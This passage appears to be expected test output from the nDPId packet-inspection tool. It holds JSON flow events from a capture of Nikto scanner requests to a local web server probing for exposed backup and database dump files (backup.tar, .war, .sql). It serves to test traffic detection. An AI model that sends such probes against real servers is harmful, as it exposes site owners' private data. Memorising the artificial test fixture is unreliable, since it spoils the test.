{"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277268,"flow_last_seen":1576420277268,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277268,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50292,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":1,"flow_last_seen":1576420277268,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277268,"pkt":"AAAAAAAAAAAAAAAACABFAADKWilAAEAG4gJ\/AAABfwAAAcR0H5DTe2KDABhOQYAYAED+vgAAAQEICp1m\/TydZv08R0VUIC8xMjdfMF8wXzEudGFyLmx6bWEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277268,"flow_last_seen":1576420277268,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277268,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50292,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277269,"flow_last_seen":1576420277269,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277269,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50294,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_packet_id":1,"flow_last_seen":1576420277269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277269,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/XglAAEAG3i1\/AAABfwAAAcR2H5D4uGaj1sX5qYAYAED+swAAAQEICp1m\/T2dZv09R0VUIC8xMjcuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277269,"flow_last_seen":1576420277269,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277269,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50294,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277270,"flow_last_seen":1576420277270,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277270,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50296,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_packet_id":1,"flow_last_seen":1576420277270,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277270,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/A5hAAEAGOJ9\/AAABfwAAAcR4H5CBQjs0aZw5xIAYAED+swAAAQEICp1m\/T6dZv0+R0VUIC8xMjcuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277270,"flow_last_seen":1576420277270,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277270,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50296,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277272,"flow_last_seen":1576420277272,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277272,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50298,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_packet_id":1,"flow_last_seen":1576420277272,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277272,"pkt":"AAAAAAAAAAAAAAAACABFAADA729AAEAGTMZ\/AAABfwAAAcR6H5Cm4tfMZrHSAYAYAED+tAAAAQEICp1m\/UCdZv1AR0VUIC8xLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277272,"flow_last_seen":1576420277272,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277272,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50298,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277274,"flow_last_seen":1576420277274,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277274,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50300,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":1,"flow_last_seen":1576420277274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277274,"pkt":"AAAAAAAAAAAAAAAACABFAADAlOZAAEAGp09\/AAABfwAAAcR8H5CKg6xDWKPSxIAYAED+tAAAAQEICp1m\/UKdZv1CR0VUIC8xLnRhci5neiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277274,"flow_last_seen":1576420277274,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277274,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50300,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277276,"flow_last_seen":1576420277276,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277276,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50302,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":1,"flow_last_seen":1576420277276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277276,"pkt":"AAAAAAAAAAAAAAAACABFAAC9in1AAEAGsbt\/AAABfwAAAcR+H5AyA7LdjyrNp4AYAED+sQAAAQEICp1m\/USdZv1DR0VUIC8wLndhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277276,"flow_last_seen":1576420277276,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277276,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50302,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277277,"flow_last_seen":1576420277277,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277277,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50304,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_packet_id":1,"flow_last_seen":1576420277277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277277,"pkt":"AAAAAAAAAAAAAAAACABFAAC906lAAEAGaI9\/AAABfwAAAcSAH5AxZOsBFr\/0GYAYAED+sQAAAQEICp1m\/UWdZv1FR0VUIC8wLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277277,"flow_last_seen":1576420277277,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277277,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50304,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277278,"flow_last_seen":1576420277278,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277278,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50306,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_packet_id":1,"flow_last_seen":1576420277278,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277278,"pkt":"AAAAAAAAAAAAAAAACABFAADCR05AAEAG9OV\/AAABfwAAAcSCH5Cv93\/sjlpOBIAYAED+tgAAAQEICp1m\/UadZv1GR0VUIC9iYWNrdXAudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277278,"flow_last_seen":1576420277278,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277278,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50306,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277279,"flow_last_seen":1576420277279,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277279,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50308,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":1,"flow_last_seen":1576420277279,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277279,"pkt":"AAAAAAAAAAAAAAAACABFAADCyNdAAEAGc1x\/AAABfwAAAcSEH5CsG\/B+ct073oAYAED+tgAAAQEICp1m\/UedZv1HR0VUIC9iYWNrdXAudGFyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277279,"flow_last_seen":1576420277279,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277279,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50308,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277281,"flow_last_seen":1576420277281,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277281,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50310,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":1,"flow_last_seen":1576420277281,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277281,"pkt":"AAAAAAAAAAAAAAAACABFAADFYHdAAEAG27l\/AAABfwAAAcSGH5C8uFjeIpIdX4AYAED+uQAAAQEICp1m\/UidZv1IR0VUIC8xMjcuMC4wLjEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277281,"flow_last_seen":1576420277281,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277281,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50310,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277282,"flow_last_seen":1576420277282,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277282,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50312,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":1,"flow_last_seen":1576420277282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277282,"pkt":"AAAAAAAAAAAAAAAACABFAADFoI1AAEAGm6N\/AAABfwAAAcSIH5D0M5gk0yESEIAYAED+uQAAAQEICp1m\/UqdZv1KR0VUIC8xMjcuMC4wLjEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277282,"flow_last_seen":1576420277282,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277282,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50312,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 